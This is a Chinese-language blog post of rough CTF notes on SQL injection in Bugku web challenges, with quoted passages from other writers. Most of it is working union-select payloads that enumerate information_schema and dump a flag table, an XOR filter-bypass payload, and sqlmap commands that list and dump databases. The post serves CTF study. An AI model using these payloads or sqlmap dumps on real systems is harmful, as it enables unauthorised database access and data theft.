[web]sql

索引: 

 

[成绩单] [login1][多次]

其他150+的web题目

=============================

首先,我们通过[多次]这个题目来学习一下

url藏着id 那么id=1 根据提示也猜存在sql注入

SQL里没有双引号用法,数据类型为字符时用单引号

---------不知道为什么  先记住吧。。

id=1后面加单引号会报错,后面加--+注释返回正常,确定存在SQL注入

【id=1‘ 是不行的  id=1=1--+是可以的(不知道为什么)】

然后试了一下  or这俩是错误 ,但oorr可以(存在过滤,可以进行双写)

那么我们用【异或注入来处理一下】

http://120.24.86.145:9004/1ndex.php?id=1'^(length('union')!=0)--+

忽然灵光一现。。。 所以说要多走走多活动活动啊,,,,

sql是恶意注入,分为:  

用了’,导致后面的语法变成了一串字符串(多神奇啊 ) 全都错了...

用了#之后,用了-- +之后.....

来源:

https://blog.csdn.net/johnlxj/article/details/82153355?utm_source=blogxgwz3

方法一:常规方法

进入这道题目 我们先手遍历一遍 id=-1' union select 1,2,3,4#

发现有四个表且都有回显

于是 就开始爆破吧

通过id=-1' union select 1,2,3,database()#得到数据库名字skctf_flag

之后通过 id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名fl4g,sc

很显然我们需要的数据在fl4g这个表里

接下来我们就要暴字段了

通过id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467#

得到字段skctf_flag

最后我们就可以开始查询数据了

通过id=-1' union select 1,2,3,skctf_flag from fl4g#

得到BUGKU{Sql_INJECT0N_4813drd8hz4}
--------------------- 

原文:https://blog.csdn.net/johnlxj/article/details/82153355 

还有就是

然后打开sqlmap开始爆库:sqlmap.py -r “C:\333.txt” -p id --current-db 
-r –> 加载一个文件 
-p –>指定参数 
–current-db –>获取当前数据库名称(current前有两个-) 


可以看到它的数据库为 ‘skctf_flag’,接着就是爆表 
sqlmap.py -r “C:\333.txt” -p id -D skctf_flag --tables 
-D –>指定数据库名称 
–tables –>列出数据库中的表(tables前有两个-) 


可以看到当前数据库中有两个表,很明显,flag应该在fl4g表中,下面就是该爆出表中的字段了 
sqlmap.py -r “C:\333.txt” -p id -D skctf_flag -T fl4g --columns 
-T –>指定表名称 
–columns –>列出表中的字段 


fl4g表中有一个名为skctf_flag字段,最后列出字段信息就可以啦。 
sqlmap.py -r “c:\333.txt” -p id -D skctf_flag -T fl4g -C skctf_flag --dump 
–dump –>列出字段数据(dump前有两个-) 

--------------------- 
作者:Tle_Camouflage 
来源:CSDN 
原文:https://blog.csdn.net/Tle_Camouflage/article/details/81978305 
版权声明:本文为博主原创文章,转载请附上博文链接!

==================

?id=1' union select 1,2,3,4 #

成绩单的题目直接使用这个注入,发现可以回显

然后下面的语句是用来搞出来系统里面备份的文件的....

以及....  ?id=1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema='skctf_flag'#

 from information_schema.tables where table_schema='skctf_flag'#

 

转载于:https://www.cnblogs.com/lx2331/p/9822585.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值